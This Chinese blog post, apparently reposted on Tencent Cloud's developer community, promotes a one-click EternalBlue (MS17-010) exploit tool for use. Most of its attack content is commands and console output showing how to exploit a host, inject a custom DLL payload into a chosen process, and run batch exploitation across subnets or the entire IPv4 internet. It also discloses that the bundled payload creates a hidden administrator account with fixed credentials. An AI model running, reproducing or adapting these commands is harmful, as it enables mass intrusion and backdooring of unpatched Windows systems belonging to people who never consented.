前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >〖EXP〗NSA MS17010永恒之蓝漏洞一键工具「建议收藏」

〖EXP〗NSA MS17010永恒之蓝漏洞一键工具「建议收藏」

作者头像
全栈程序员站长
发布2022-09-05 15:14:04
3.1K0
发布2022-09-05 15:14:04
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

漏洞简介

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

漏洞检测

无损检测,不会对目标造成任何危害,大家无需担心

Ladon 192.168.1.8 MS17010 Ladon 192.168.1.8/24 MS17010 Ladon 192.168.1.8/c MS17010

检测发现存在漏洞高亮显示

image
image

独立使用

只需提供IP或IP列表即可自动利用永恒之蓝,当然也可以使用Ladon来批量甚至全网

PS: 由于当时漏洞影响很大,所以并未放出一键批量工具,现在4年过去了,还没打补丁就只能建议开除维护人员了,工具调用的是NSA原版的EXP,所以整个SMBSCAN目录里的文件基本上都是被杀的,这就不方便集成在Ladon里,以免Ladon被所有杀软杀。

代码语言:javascript
复制
C:\Users\k8gege\Desktop\SmbExp>ksmb 192.168.1.89
MS17010-EXP ETERNALBLUE by K8gege

IP:  192.168.1.89
OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
只IP默认445端口

ksmb 192.168.1.89

自定义端口

ksmb 192.168.1.89 445 适用于代理出来打,不用考虑做免杀,而且免杀一堆文件也很麻烦

自定义DLL

ksmb 192.168.1.89 445 mydll.dll

注入指定进程

ksmb 192.168.1.89 445 mydll.dll explorer.exe

Ladon调用

使用Ladon可轻松批量使用自己的POC,即只需要实现一个功能,剩下交给Ladon,不用每次来什么新洞都得浪费时间写批量利用工具。除了花一堆时间调式EXP,还得把它弄成批量,批量又得考虑多线程是否兼容POC里的代码等等问题,等写完时效性都过了。Ladon可批量主机、批量URL、批量网段、全网等等,非常方便,下面就是调用ms17010exp的例子。

代码语言:javascript
复制
C:\Users\k8gege\Desktop\SmbExp>Ladon 192.168.1.89 ksmb.exe
Ladon 7.5
Start: 2020-12-17 23:40:16
Runtime: .net 2.0  ME: x64 OS: x64
OS Name: Microsoft Windows 8.1 Enterprise
RunUser: k8gege PR: -IsUser
PID: 5804  CurrentProcess: Ladon

Call DiyMoudle (c# exe)
load ksmb.exe
ICMP: 192.168.1.89      00-0C-29-CF-FE-E1       VMware
MS17010-EXP ETERNALBLUE by K8gege

IP:  192.168.1.89
OS:  64-bit 6.1 build 7601     Windows 2008 R2 Enterprise 7601 SP 1
VUL: 3 (ETERNALBLUE     - DANE  ETERNALROMANCE  - FB    ETERNALCHAMPION - DANE/F
B)
EXP: Use Eternalblue & Doublepulsar
DLL: x64 Payload Injected
批量利用

Ladon 192.168.1.89/c ksmb.exe Ladon 192.168.1.89/24 ksmb.exe

全网扫描

Ladon 0.0.0.0-255.255.255.255 ksmb.exe

成功结果

自带DLL会添加以下管理员用户 k8ms17010exp K8gege520!@#

可替换DLL,执行自定义功能

image
image

下载

EXP小密圈内下载

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/136691.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年6月3,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 漏洞简介
  • 漏洞检测
  • 独立使用
    • 只IP默认445端口
      • 自定义端口
        • 自定义DLL
          • 注入指定进程
          • Ladon调用
            • 批量利用
              • 全网扫描
              • 成功结果
              • 下载
              相关产品与服务
              脆弱性检测服务
              脆弱性检测服务(Vulnerability detection Service,VDS)在理解客户实际需求的情况下,制定符合企业规模的漏洞扫描方案。通过漏洞扫描器对客户指定的计算机系统、网络组件、应用程序进行全面的漏洞检测服务,由腾讯云安全专家对扫描结果进行解读,为您提供专业的漏洞修复建议和指导服务,有效地降低企业资产安全风险。
              领券
              问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档